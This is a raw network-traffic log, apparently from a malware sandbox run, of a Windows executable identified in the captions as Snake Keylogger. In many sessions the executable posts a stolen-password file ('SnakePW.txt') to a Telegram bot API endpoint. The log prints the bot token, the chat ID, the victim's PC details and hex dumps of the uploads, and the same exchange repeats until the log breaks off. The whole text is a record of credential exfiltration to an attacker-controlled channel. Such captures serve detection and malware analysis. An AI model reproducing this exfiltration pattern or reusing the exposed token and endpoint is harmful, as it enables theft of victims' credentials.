                                                                    2022-06-26 07:32:25 UTC0OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 63 37 37 61 30 39 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756c77a0974Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:25 UTC0INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:25 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:25 UTC1INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66746,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228745,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.549769149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:38 UTC1OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d450ded5
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:38 UTC2OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 34 35 30 64 65 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d450ded5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:39 UTC2INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:39 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:39 UTC2INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66747,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228758,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    10192.168.2.549778149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:42 UTC16OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d69dc2b3
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:42 UTC17OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 36 39 64 63 32 62 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d69dc2b3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:42 UTC17INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:42 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:42 UTC18INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66756,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228762,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    100192.168.2.549947149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:21 UTC168OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756edd5834d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:21 UTC169OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 64 64 35 38 33 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756edd5834dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:21 UTC169INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:21 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:21 UTC170INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66859,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228801,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    101192.168.2.549948149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:21 UTC170OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ee09fa00
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:21 UTC170OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 65 30 39 66 61 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ee09fa00Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:21 UTC171INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:21 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:21 UTC171INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66860,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228801,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    102192.168.2.549949149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:22 UTC172OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ee4f1b35
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:22 UTC172OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 65 34 66 31 62 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ee4f1b35Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:22 UTC173INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:22 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:22 UTC173INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66861,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228802,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    103192.168.2.549950149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:22 UTC173OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ee838fab
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:22 UTC174OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 65 38 33 38 66 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ee838fabContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:22 UTC174INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:22 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:22 UTC175INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66862,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228802,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    104192.168.2.549951149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:22 UTC175OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756eec18c9c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
